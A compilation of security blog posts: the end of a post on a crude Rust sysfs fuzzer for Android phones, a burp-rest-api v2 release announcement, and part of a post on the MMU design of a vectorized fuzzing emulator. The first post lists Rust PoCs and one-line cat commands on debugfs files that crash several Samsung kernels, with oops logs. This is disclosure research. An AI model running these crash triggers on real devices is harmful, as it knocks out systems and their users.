First let’s only allow use of /sys/* and beyond, all other files will be disallowed, typically these bugs from the fuzzer come from sysfs and procfs. We’ll do this by changing the directory listing call to listdirs(Path::new("/sys"), &mut dirlisting);

Woo, it worked! Crashed faster, and this time we limited to /sys. So we know the bug exists somewhere in /sys.

Now we’ll go deeper in /sys, maybe we try /sys/devices… oops, no luck. We’ll have to try another. Maybe /sys/kernel?… WINNER WINNER!

So we’ve whittled it down further to /sys/kernel/debug but now there are 85 folders in this directory. I really don’t want to manually try all of them. Maybe we can improve our fuzzer?

Improving the fuzzer

So currently we have no idea which files were touched to cause the crash. We can print them and then view them over ADB, however this doesn’t sync when the phone panics… we need even better.

Perhaps we should just send the filenames we’re fuzzing over the network and then have a service that acks the filenames, such that the files are not touched unless they have been confirmed to be reported over the wire. Maybe this would be too slow? Hard to say. Let’s give it a go!

We’ll make a quick server in Rust to run on our host, and then let the phone connect to this server over ADB USB via adb reverse tcp:13370 tcp:13370, which will forward connections to 127.0.0.1:13370 on the phone to our host where our program is running and will log filenames.

Designing a terrible protocol

We need a quick protocol that works over TCP to send filenames. I’m thinking something super easy. Send the filename, and then the server responds with “ACK”. We’ll just ignore threading issues and the fact that heap corruption bugs will usually show up after the file was accessed. We don’t want to get too carried away and make a reasonable fuzzer, eh?

use std::net::TcpListener;
use std::io::{Read, Write};

fn main() -> std::io::Result<()> {
    let listener = TcpListener::bind("0.0.0.0:13370")?;

    let mut buffer = vec![0u8; 64 * 1024];

    for stream in listener.incoming() {
        print!("Got new connection\n");

        let mut stream = stream?;

        loop {
            if let Ok(bread) = stream.read(&mut buffer) {
                // Connection closed, break out
                if bread == 0 {
                    break;
                }

                // Send acknowledge
                stream.write(b"ACK").expect("Failed to send ack");
                stream.flush().expect("Failed to flush");

                let string = std::str::from_utf8(&buffer[..bread])
                    .expect("Invalid UTF-8 character in string");
                print!("Fuzzing: {}\n", string);
            } else {
                // Failed to read, break out
                break;
            }
        }
    }

    Ok(())
}

This server is pretty trash, but it’ll do. It’s a fuzzer anyways, can’t find bugs without buggy code.

Client side

From the phone we just implement a simple function:

// Connect to the server we report to and pass this along to functions
// threads that need socket access
let stream = Arc::new(Mutex::new(TcpStream::connect("127.0.0.1:13370")
    .expect("Failed to open TCP connection")));

fn inform_filename(handle: &Mutex<TcpStream>, filename: &str) {
    // Report the filename
    let mut socket = handle.lock().expect("Failed to lock mutex");
    socket.write_all(filename.as_bytes()).expect("Failed to write");
    socket.flush().expect("Failed to flush");

    // Wait for an ACK
    let mut ack = [0u8; 3];
    socket.read_exact(&mut ack).expect("Failed to read ack");
    assert!(&ack == b"ACK", "Did not get ACK as expected");
}

Developing blacklist

Okay so now we have a log of all files we’re fuzzing, and they’re confirmed by the server so we don’t lose anything. Lets set it into single threaded mode so we don’t have to worry about race conditions for now.

We’ll see it frequently gets hung up on files. We’ll make note of the files it gets hung up on and start developing a blacklist. This takes some manual labor, and usually there are a handful (5-10) files we need to put in this list. I typically make my blacklist based on the start of a filename, thus I can blacklist entire directories based on starts_with matching.

Back to fuzzing

So when fuzzing the last file we saw touched was /sys/kernel/debug/smp2p_test/ut_remote_gpio_inout before a crash.

Let’s hammer this in a loop… and it worked! So now we can develop a fully self contained PoC:

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let fn = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(fn) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

What a top tier PoC!

Next bug?

So now that we have root caused the bug, we should blacklist the specific file we know caused the bug and try again. Potentially this bug was hiding another.

Nope, nothing else, the S5 is officially secure and fixed of all bugs.

The end of an era

Sadly this fuzzer is on the way out. It used to work almost universally on every phone, and still does if selinux is set to permissive. But sadly as time has gone on these bugs have become hidden behind selinux policies that prevent them from being reached. It now only works on a few phones that I have rather than all of them, but the fact that it ever worked is probably the best part of it all.

There is a lot to improve this fuzzer, but the goal of this article was to make a terrible fuzzer, not a reasonable one. The big things to add to make this better

  • Make it perform random ioctl() calls
  • Make it attempt to mmap() and use the mappings for these devices
  • Actually understand what the file expects
  • Use multiple processes or something to let the fuzzer continue to run when it gets stuck
  • Run it for more than 1 minute before giving up on a phone
  • Make better blacklists/whitelists

In the future maybe I’ll exploit one of these bugs in another blog, or root cause them in source.

Wall of Shame

Try it out on your own test phones (not on your actual phone, that’d probably be a bad idea). Let me know if you have any silly bugs found by this to add to the wall of shame.

G900F (Exynos Galaxy S5) [G900FXXU1CRH1] (August 1, 2017)

PoC

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let fn = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(fn) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

J200H (Galaxy J2) [J200HXXU0AQK2] (August 1, 2017)

not root caused, just run the fuzzer

[c0] Unable to handle kernel paging request at virtual address 62655726
[c0] pgd = c0004000
[c0] [62: ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
sp : ee457d20  ip : 00000000  fp : ee457d54
[c0] r10: ed859210  r9 : c0c833e4  r8 : ed859338
[c0] r7 : ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d0013 00000000 ffffffff ffffffff
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d[<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)
[c0] [<c003d6bc>] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/usb_serial0/readstatus

or

cat /sys/kernel/debug/usb_serial1/readstatus

or

cat /sys/kernel/debug/usb_serial2/readstatus

or

cat /sys/kernel/debug/usb_serial3/readstatus

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/mdp/xlog/dump

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/rpm_master_stats

J700H (Galaxy J7) [J700HXXU3BRC2] (August 1, 2017)

not root caused, just run the fuzzer

Unable to handle kernel paging request at virtual address ff00000107
pgd = ffffffc03409d000
[ff00000107] *pgd=0000000000000000
mms_ts 9-0048: mms_sys_fw_update [START]
mms_ts 9-0048: mms_fw_update_from_storage [START]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] file_open - path[/sdcard/melfas.mfsb]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] -3
mms_ts 9-0048: mms_sys_fw_update [DONE]
muic-universal:muic_show_uart_sel AP
usb: enable_show dev->enabled=1
sm5703-fuelga0000000000000000
Kernel BUG at ffffffc00034e124 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000004 [#1] PREEMPT SMP
exynos-snapshot: item - log_kevents is disabled
CPU: 4 PID: 9022 Comm: lulandroid Tainted: G        W    3.10.61-8299335 #1
task: ffffffc01049cc00 ti: ffffffc002824000 task.ti: ffffffc002824000
PC is at sysfs_open_file+0x4c/0x208
LR is at sysfs_open_file+0x40/0x208
pc : [<ffffffc00034e124>] lr : [<ffffffc00034e118>] pstate: 60000045
sp : ffffffc002827b70

G920F (Exynos Galaxy S6) [G920FXXU5DQBC] (Febuary 1, 2017) Now gated by selinux :(

sec_debug_store_fault_addr 0xffffff80000fe008
Unhandled fault: synchronous external abort (0x96000010) at 0xffffff80000fe008
------------[ cut here ]------------
Kernel BUG at ffffffc0003b6558 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000010 [#1] PREEMPT SMP
exynos-snapshot: core register saved(CPU:0)
CPUMERRSR: 0000000012100088, L2MERRSR: 00000000111f41b8
exynos-snapshot: context saved(CPU:0)
exynos-snapshot: item - log_kevents is disabled
CPU: 0 PID: 5241 Comm: hookah Tainted: G        W      3.18.14-9519568 #1
Hardware name: Samsung UNIVERSAL8890 board based on EXYNOS8890 (DT)
task: ffffffc830513000 ti: ffffffc822378000 task.ti: ffffffc822378000
PC is at samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
LR is at samsung_pinconf_dbg_show+0x88/0xb0
Call trace:
[<ffffffc0003b6558>] samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
[<ffffffc0003b661c>] samsung_pinconf_dbg_show+0x84/0xb0
[<ffffffc0003b66d8>] samsung_pinconf_group_dbg_show+0x90/0xb0
[<ffffffc0003b4c84>] pinconf_groups_show+0xb8/0xec
[<ffffffc0002118e8>] seq_read+0x180/0x3ac
[<ffffffc0001f29b8>] vfs_read+0x90/0x148
[<ffffffc0001f2e7c>] SyS_read+0x44/0x84

G950F (Exynos Galaxy S8) [G950FXXU4CRI5] (September 1, 2018)

Can crash by getting PC in the kernel. Probably a race condition heap corruption. Needs a groom.

(This PC crash is old, since it’s corruption this is some old repro from an unknown version, probably April 2018 or so)

task: ffffffc85f672880 ti: ffffffc8521e4000 task.ti: ffffffc8521e4000
PC is at jopp_springboard_blr_x2+0x14/0x20
LR is at seq_read+0x15c/0x3b0
pc : [<ffffffc000c202b0>] lr : [<ffffffc00024a074>] pstate: a0000145
sp : ffffffc8521e7d20
x29: ffffffc8521e7d30 x28: ffffffc8521e7d90
x27: ffffffc029a9e640 x26: ffffffc84f10a000
x25: ffffffc8521e7ec8 x24: 00000072755fa348
x23: 0000000080000000 x22: 0000007282b8c3bc
x21: 0000000000000e71 x20: 0000000000000000
x19: ffffffc029a9e600 x18: 00000000000000a0
x17: 0000007282b8c3b4 x16: 00000000ff419000
x15: 000000727dc01b50 x14: 0000000000000000
x13: 000000000000001f x12: 00000072755fa1a8
x11: 00000072755fa1fc x10: 0000000000000001
x9 : ffffffc858cc5364 x8 : 0000000000000000
x7 : 0000000000000001 x6 : 0000000000000001
x5 : ffffffc000249f18 x4 : ffffffc000fcace8
x3 : 0000000000000000 x2 : ffffffc84f10a000
x1 : ffffffc8521e7d90 x0 : ffffffc029a9e600

PC: 0xffffffc000c20230:
0230  128001a1 17fec15d 128001a0 d2800015 17fec46e 128001b4 17fec62b 00000000
0250  01bc8a68 ffffffc0 d503201f a9bf4bf0 b85fc010 716f9e10 712eb61f 54000040
0270  deadc0de a8c14bf0 d61f0000 a9bf4bf0 b85fc030 716f9e10 712eb61f 54000040
0290  deadc0de a8c14bf0 d61f0020 a9bf4bf0 b85fc050 716f9e10 712eb61f 54000040
02b0  deadc0de a8c14bf0 d61f0040 a9bf4bf0 b85fc070 716f9e10 712eb61f 54000040
02d0  deadc0de a8c14bf0 d61f0060 a9bf4bf0 b85fc090 716f9e10 712eb61f 54000040
02f0  deadc0de a8c14bf0 d61f0080 a9bf4bf0 b85fc0b0 716f9e10 712eb61f 54000040
0310  deadc0de a8c14bf0 d61f00a0 a9bf4bf0 b85fc0d0 716f9e10 712eb61f 54000040

PoC

extern crate rand;

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // These are the 2 files we want to fuzz
    let random_paths = [
        "/sys/devices/platform/battery/power_supply/battery/mst_switch_test",
        "/sys/devices/platform/battery/power_supply/battery/batt_wireless_firmware_update"
    ];

    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    loop {
        // Pick a random file
        let file = &random_paths[rand::random::<usize>() % random_paths.len()];

        // Read a random number of bytes from the file
        if let Ok(mut fd) = File::open(file) {
            let rsz = rand::random::<usize>() % (buf.len() + 1);
            let _ = fd.read(&mut buf[..rsz]);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

Introducing burp-rest-api v2

4 November 2018 at 23:00

Since the first commit back in 2016, burp-rest-api has been the default tool for BurpSuite-powered web scanning automation. Many security professionals and organizations have relied on this extension to orchestrate the work of Burp Spider and Scanner.

Today, we’re proud to announce a new major release of the tool: burp-rest-api v2.0.1

Starting in June 2018, Doyensec joined VMware in the development and support of the growing burp-rest-api community. After several years of experience in big tech companies and startups, we understand the need for security automation to improve efficacy and efficiency during software security activities. Unfortunately internal security tools are rarely open-sourced, and still, too many companies are reinventing the wheel. We believe that working together on foundational components, such as burp-rest-api, represents the future of security automation as it empowers companies of any size to build customized solutions.

After a few weeks of work, we cleaned up all the open issues and brought burp-rest-api to its next phase. In this blog post, we would like to summarize some of the improvements.

Releases

You can now download the latest version of burp-rest-api from https://github.com/vmware/burp-rest-api/releases in a precompiled release build. While this may not sound like a big deal, it’s actually the result of a major change in the plugin bootstrap mechanism. Until now, burp-rest-api was strictly dependent on the original Burp Suite JAR to be compiled, hence we weren’t able to create stable releases due to licensing. By re-engineering the way burp-rest-api starts, it is now possible to build the extension without even having burpsuite_pro.jar.

git clone [email protected]:vmware/burp-rest-api.git
cd burp-rest-api
./gradlew clean build

Once built, you can now execute Burp with the burp-rest-api extension using the following command:

java -jar burp-rest-api-2.0.0.jar --burp.jar=./lib/burpsuite_pro.jar

Burp Extensions and BAppStore

Many users have asked for the ability to load additional extensions while running Burp with burp-rest-api. Thanks to a new bootstrap mechanism, burp-rest-api is loaded as a 2nd generation extension which makes it possible to load both custom and BAppStore extensions written in any of the supported programming languages.

Moreover, the tool allows loading extensions during application startup using the flag --burp.ext=<filename.{jar,rb,py}>.

In order to implement this, we employed a classloading technique with a dummy entry point (BurpExtender.java) that loads the legacy Burp extension (LegacyBurpExtension.java) after the full Burp Suite has been loaded and launched (BurpService.java).

Bug Fixes and Improvements

In this release, we have also focused our efforts on a massive issues house-cleaning:

  • Better documentation and even a FAQs page
  • Burp Spider status API
  • Burp Configuration with configPath selection API
  • Enabled SpringBoot compression
  • Ability to customize the binding address:port for both Burp Proxy and burp-rest-api APIs via command line arguments
  • …and much more

Help Us Shape The Future of burp-rest-api

With the release of Burp Suite Professional 2.0 (beta), Burp includes a native Rest API.

While the current functionalities are very limited, this is certainly going to change.

In the initial release, the REST API supports launching vulnerability scans and obtaining the results. Over time, additional functions will be added to the REST API.

It’s great that Burp users will finally benefit from a native Rest API, however this new feature makes us wonder about the future for this project.

Let us know how burp-rest-api can still provide value, and which directions the project could take. Comment on this Github Issue or tweet to our @Doyensec account.

Thank you for the support,

Luca Carettoni & Andrea Brancaleoni

Vectorized Emulation: MMU Design

19 November 2018 at 19:10

Softserve

New vectorized emulator codenamed softserve

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up.

Check out the intro

This is the continuation of a multipart series. See the introduction post here

This post assumes you’ve read the intro and doesn’t explain some of the basics of the vectorized emulation concept. Go read it if you haven’t!

Further this blog is a lot more technical than the introduction. This is meant to go deep enough to clear up most/all potential questions about the MMU. It expects that you have a general knowledge of page tables and virtual addressing models. Hopefully we do a decent job explaining these things such that it’s not a hard requirement!

The code

This blog explains the intent behind a pretty complex MMU design. The code that this blog references can be found here. I have no plans to open source the vectorized emulator and this MMU is just a snapshot of what this blog is explaining. I have no intent to update this code as I change my MMU model. Further this code is not buildable as I’m not open sourcing my assembler, however I assume the syntax is pretty obvious and can be read as pseudocode.

By sharing this code I can talk at a higher level and allow the nitty-gritty details to be explained by the actual implementation.

It’s also important to note that this code is not being used in production yet. It’s got room for micro-optimizations and polish. At least it should be doing the correct operations and hopefully the tests are verifying this. Right now I’m trying to keep it simple to make sure it’s correct and then polish it later using this version as reference.

Intro

Today we’re going to talk about the internals of the memory management unit (MMU) design I have used in my vectorized emulator. The MMU is responsible for creating the fake memory environment of the VMs that run under the emulator. Further the MMU design used here also is designed to catch bugs as early as possible. To do this we implement what I call a “byte-level MMU”, where each byte has it’s own permission bits. Since vectorized emulation is meant for fuzzing it’s also important that the memory state can quickly be restored to the original state quickly so a new fuzz iteration can be started.

During this blog we introduce a few big concepts:

  • Differential restores
  • Byte-level permissions
  • Read-after-write memory (uninitialized memory tracking)
  • Gage fuzzing
  • Aliased/CoW memory
  • Deduplicated memory
  • Technical details about the IL relevant to the MMU
  • Painful details about everything

Since this emulator design is meant to run multiple architectures and programs in different environments, it’s critical the MMU design supports a superset of the features of all the programs I may run. For example, system processes typically are run in the high memory ranges 0xffff... and above. Part of the design here is to make sure that a full guest address space can be used, including high memory addresses. Things like x86_64 have 48-bit address spaces, where things like ARM64 have 49-bit address spaces (2 separate 48-bit address spaces). Thus to run an ARM64 target on x86 I need to provide more bits than actually present. Luckily most systems use this address space sparsely, so by using different data structures we can support emulating these targets with ease.

The problem

Before we get into describing the solution, let’s address what the problem is in the first place!

When creating an emulator it’s important to create isolation between the emulated guest and the actual system. For example if the guest accesses memory, it’s important that it can only access it’s own memory, and it isn’t overwriting the emulator’s memory itself. To do this there are multiple traditional solutions:

  • Restrict the address space of the guest such that it can fit entirely in the emulator’s address space
  • Use a data structure to emulate a sparse guest’s memory space
  • Create a new process/VM with only the guest’s memory mapped in

The first solution is the simplest, fastest, but also the least portable. It typically consists of allocating a buffer the size of the guest’s address space, and then any guest memory accesses are added to the base of this buffer and ensured to not go out of bounds. A model like this can rely on the hardware’s permission checking by setting permissions via mmap or VirtualProtect. This is an extremely fast model and allows for running applications that fit inside of the emulator’s address space. When running a 64-bit VM this can become tough as most OSes do not provide a means of allocating memory in the high part of the address space 0xffff... and beyond. This memory is typically reserved for the kernel. This is the model used by things like qemu-user as it is super fast and works great for well-behaving userland applications. By setting the QEMU_GUEST_BASE environment variable you can change this base and set the size with QEMU_RESERVED_VA.

The second solution is fairly slow, but allows for more strict memory permissions than the host system allows. Typically the data structure used to access the guest’s memory is similar to traditional page table models used in hardware. However since it’s implemented in software it’s possible to change these page tables to contain any metadata or sizes as desired. This is the model I ultimately use, but with a few twists from traditional page tables.

The third solution leverages something like VT-x or a thin process to almost directly use the target hardware’s page table models for a VM. This will make the emulator tied to an architecture, might require a driver, and like the first solution, doesn’t allow for stricter memory models. This is actually one of the first models I used in my emulator and I’ll go into it a bit more in the history section


History

Feel free to skip this section if you don’t care about context

To give some background on how we ended up where we ended up it’s important to go through the background of the MMU designs used in the past. Note that the generations aren’t the same MMU improving, it’s just different MMUs I’ve designed over time.

First generation

The first generation of my MMU was a simple modification to QEMU to allow for quick tracking of which memory was modified. In this case my target was a system level target so I was not using qemu-user, but rather qemu-system. I ripped out the core physical memory manager in QEMU and replaced it with my own that effectively mimicked the x86 page table model. I was most comfortable with the x86 page table model and since it was implemented in hardware I assumed it was probably well engineered. The only interest I had in this first MMU was to quickly gather which memory was modified so I could restore only the dirtied memory to save time during reset time. This had a huge improvement for my hypervisor so it was natural for me to just copy it over the QEMU so I could get the same benefits.

Second generation

While still continuing on QEMU modifications I started to get a bit more creative. Since I was handling all the physical memory accesses directly in software, there was no reason I couldn’t use page tables of my own shape. I switched to using a page table that supported 32-bit addresses (my target was MIPS32 and ARM32) using 8-bits per table. This gave me 256-byte pages rather than traditional 4-KiB x86 pages and allowed me to reset more specific dirty pages and reduces the overall work for resets.

Third generation

At this point I was tinkering around with different page table shapes to find which worked fast. But then I realized I could set the final translation page size to 1-byte and I would be able to apply permissions to any arbitrary location in memory. Since memory of the target system was still using 4-KiB pages I wasn’t able to apply byte-level permissions in the snapshotted target, however I was able to apply byte-level permissions to memory returned from hooked functions like malloc(). By setting permissions directly to the size actually requested by malloc() we could find 1-byte out-of-bounds memory accesses. This ended up finding a bug which was only slightly out-of-bounds (1 or 2 bytes), and since this was now a crash it was prioritized for use in future fuzz cases. This prioritization (or feedback) eventually ended up with the out-of-bounds growing to hundreds of bytes, which would crash even on an actual system.

Fourth generation

I ended up designing my own emulator for MIPS32, performance wasn’t really the focus. I basically copied the model I used for the 3rd generation. I also kept the 1-byte paging as by this point it was a potent tool in my toolbag. However once I switched this emulator to use JIT I started to run into some performance issues. This caused me to drop the emulated page tables and byte level permissions and switch to a direct-memory-access model.

At this time I was doing most of my development for my emulator to run directly on my OS. Since my OS didn’t follow any traditional models this allowed me to create a user-land application with almost any address space as I wanted. I directly used the MMU of the hardware to support running my JIT in the context of a different address space. In this model the JITted code just directly accessed memory, which except for a few pages in the address space, was just the exact same as the actual guest’s address space.

For example if the guest wanted to access address 0x13370000, it would just directly dereference the memory at 0x1337000. No translation, not base applied, simple.

You can see this code in the srcs/emu folder in falkervisor.

I used this model for a long time as it was ideal for performance and didn’t really restrict the guest from any unique address space shapes. I used this memory model in my vectorized emulator for quite a while as well, but with a scale applied to the address as I interleaved multiple VM’s memory.

Fifth generation

The vectorized emulator was initially designed for hard targets, and the primary goal was to extract as much information as possible from the code under test. When trying to improve it’s ability to find bugs I remembered that in the past I had done a byte-level MMU with much success. I had a silly idea of how I could handle these permission checks. Since in the JIT I control what code is run when doing a read or write, I could simply JIT code to do the permission checks. I decided that I would simply have 1 extra byte for every byte of the target. This byte would be all of the permissions for the corresponding byte in the memory map (read, write, and/or execute).

Since now I needed to have 2 memory regions for this, I started to switch from using my OS and the stripped down user-land process address space to using 2 linear mappings in my process. Since this was more portable I decided to start developing my vectorized emulator to run on just Windows/Linux. On a guest memory access I would simply bounds check the address to make sure it’s in a certain range, and then add the address to the base/permission allocations. This is similar to what qemu-user does but with a permission region as well. The JIT would check these permissions by reading the permissions memory first and checking for the corresponding bits.

Sixth generation

The performance of the fifth generation MMU was pretty good for JIT, but was terrible for process start times. I would end up reserving multiple terabytes of memory for the guest address spaces. This made it take a long time to start up processes and even tear them down as they blocked until the OS cleaned up their resources. Further commit memory usage was quite high as I would commit entire 4-KiB guest pages, which were actually 128-KiB (16 vectorized VMs * 2 regions (permission and memory region) * 4 KiB). To mitigate these issues we ended up at the current design….


Page Tables

Before we hop into soft MMU design it’s important to understand what I mean when I say page tables. Page tables take some bit-slice of the address to be translated and use it as the index for an element in a first level table. This table points to another table which is then indexed by a different bit-slice of the same address. This may continue for however many levels are used in the page table. In my case the shape of this page table is dynamically configurable and we’ll go into that a bit more.

Page table

In the case of 64-bit x86 there is a 4 level lookup, where 9 bits are used for each level. This means each page table contains 512 entries. Each entry is a pointer to the next page table, or the actual page if it’s the final level. Finally the bottom 12 bits of the address are used as the offset into the page to find the specific byte. This paging model would show up as [9, 9, 9, 9, 12] according to my dynamic paging model. This syntax will be explained later.

For x86 there are alignment requirements for the page table entries (must be 4-KiB aligned). Further physical addresses are only 52-bits. This leaves 12 bits at the bottom of the page table entry and 12 bits at the top for use as metadata. x86 uses this to store information such as: If the page is present, writable, privileged, caching behavior, whether it’s been accessed/modified, whether it’s executable, etc. This metadata has no cost in hardware but in software, traversing this has a cost as the metadata must be masked off for the pointer to be extracted. This might not seem to matter but when doing billions of translations a second, the extra masking operations add up.

Here’s the actual metadata of a 4 KiB page on 64-bit Intel:

Page table metadata


The overall design

My vectorized emulator is being rewritten to be 64-bit rather than 32-bit. We’re now running 2048 VMs rather than 4096 VMs as we can only run 8 VMs per thread. All of this design is for 64-bits.

When designing the new MMU there were a few critical features it needed:

  • Byte level permissions
  • Fast snapshot/restore times
  • A data structure that could be quickly traversed in JIT
  • Quick process start times
  • The ability to handle full 64-bit address spaces
  • Low memory usage (we need to run 2048 VMs)
  • Quick methods for injecting fuzz inputs (we need a way to get fuzz inputs in to the memory millions of times per second)
  • Must be easily tested for correctness
  • Ability to track uninitialized memory at a byte-level
  • Read-only memory shared between all cores

Applying byte-level permissions

So we have this byte-level permission goal, but how do we actually get byte-level information to apply anyways?

Since most fuzzing is done from an already-existing snapshot from a real system with 4 KiB paging and permissions, we cannot just magically get byte-level permissions. We have to find locations that can be restricted to specific byte-level sizes.

The easiest way to do this is just ignore everything in the snapshot. We can apply byte-level permissions to only new memory allocations that we emulate by adding breakpoints to the target’s allocate routines. Further by hooking frees we can delete the mappings and catch use-after-frees.

We can get a bit more fancy if we’re enlightened as to the internals of the allocator of the target under test. Upon loading of the snapshot we could walk the heap metadata and trim down allocations to the byte-level sizes they originally requested. If the heap does not provide the requested size then this is not possible. Further allocations which fit perfectly in a bin might not have any room after them to place even a single guard byte.

To remedy these problems there a few solutions. We can use page heap in the application we’re taking a snapshot in, which will always ensure we have a page after the allocation we can play with for guard bytes. Further page heap has the requested size in the metadata so we can get perfect byte-level applied.

If page heap is not available for the allocator you’re gonna have to get really creative and probably replace the allocator. You could also hack it up and use a debugger to always add a few bytes to each allocation (ensuring room for guard bytes), while logging the requested sizes. This information could then be used to create a perfect byte heap.

Getting even fancier

When going at a really hard target you could also start to add guard bytes between padding fields of structures (using symbol information or compiler plugins) and globals. The more you restrict, the more you can detect.


Design features

Basics of the vectorized model

This was covered in the intro, but since it’s directly applicable to the MMU it’s important to mention here.

Memory between the different lanes on a given core is interleaved at the 8-byte level (4-byte level for 32-bit VMs). This means that when accessing the same address on all VMs we’re able to dispatch a single read at one address to load all 8 VM’s memory. This has the downside of unaligned memory accesses being much more expensive as they now require multiple loads. However the common case most memory is accessed at the same address, and memory does not straddle a 8-byte boundary. It’s worth it.

For reference the cost of a single load instruction vmovdqa64 is about 4-5 cycles, where a vpgatherqq load is 20-30 cycles. Unless memory is so frequently accessed from different addresses and straddling 8-byte boundaries it is always worth interleaving.

VM interleaving looks as follows:

chart simplified to show 4 lanes instead of 8

Guest Address Host Address Qword 1 Qword 2 Qword 3 Qword 8
0x0000 0x0000 1 2 3 33
0x0008 0x0040 32 74 55 45
0x0010 0x0080 24 24 24 24

This interleaves all the memory between the VMs at an 8-byte level. If a memory access straddles an 8-byte value things get quite slow but this is a rare case and we’re not too concerned about it.

How do we build a testable model?

To start off development it was important to build a good foundation that could be easily tested. To do this I tried to write everything as naive as possible to decrease the chance of mistakes. Since performance is only really required in the JIT, the Rust-level MMU routines were written cleanly and used as the reference implementation to test against. If high-performance methods were needing for modifying memory or permissions they would be supplemental and verified against the naive implementation. This set us up to be in good shape for testing!

64-bit address spaces

To support full 64-bit address spaces we are forced to use some data structure to handle memory as nothing in x86 can directly use a 64-bit address space. Page tables continue to be the design we go with here.

Since we were writing the code in a naive way, it was easy to make most of the MMU model configurable by constants in the code. For example the shape of the page tables is defined by a constant called PAGE_TABLE_LAYOUT. This is used in reality in the form: const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];.

This array defines the number of bits used for translating each level in the page table, and PAGE_TABLE_DEPTH sets the number of levels in the page table. In the example above this shows that we use the top 16-bits for the first level as the index, the next 16-bits for the next level, the next 16-bits again for another level, a 13-bit level, and finally a 3-bit page size. As long as this PAGE_TABLE_LAYOUT adds up to 64-bits, contains at least 2 entries (1 level page table), and at least has a final translation size of 8-byte (like in the example), the MMU and JITs will be updated. This allows profiling to be done of a specific target and modify the page table to whatever shape works best. This also allows for changes between performance and memory usage if needed.

Fast restores

When writing my hypervisor I walked the SVM page tables looking for dirty pages to restore. On x86 there are only dirty bits on the last level of the page tables. For all other levels there’s only an ‘accessed’ bit (updated when the translation is used for any access). I would walk every entry in each page table, if it was accessed I would recurse to the next level, otherwise skip it, at the final level I would check for the dirty bit and only restore the memory if it was marked as dirty. This meant I walked the page tables for all the memory that was ever used, but only restored dirty memory. Walking the page tables caused quite a bit of cache pollution which would cause significant damage to the performance of other cores.

To speed this up I could potentially place a dirty bit on every page table level, and then I would only ever start walking a path that contains a dirty page. I used this model at some point historically, however I’ve got a better model now.

Instead of walking page tables I just now append the address to a vector when I first set a dirty bit. This means when resetting a VM I only read a linear array of addresses to restore. I still need a dirty bit somewhere so I make sure I don’t add duplicates to this list. Since I no longer need to walk page tables I only put dirty bits on the final level. This was a decision driven by actual data on real targets, it’s much faster.

If during execution I run out of entries in this dirty list I exit out of the VM with a special VM-exit status indicating this list is full. This then allows me to append this list at Rust-level to a dynamically sized allocation. Since the size of this list is tunable it would grow as needed and converge to never hitting VM-exits due to dirty list exhaustion. Further this dirty list is typically pretty tiny so the cost isn’t that high.

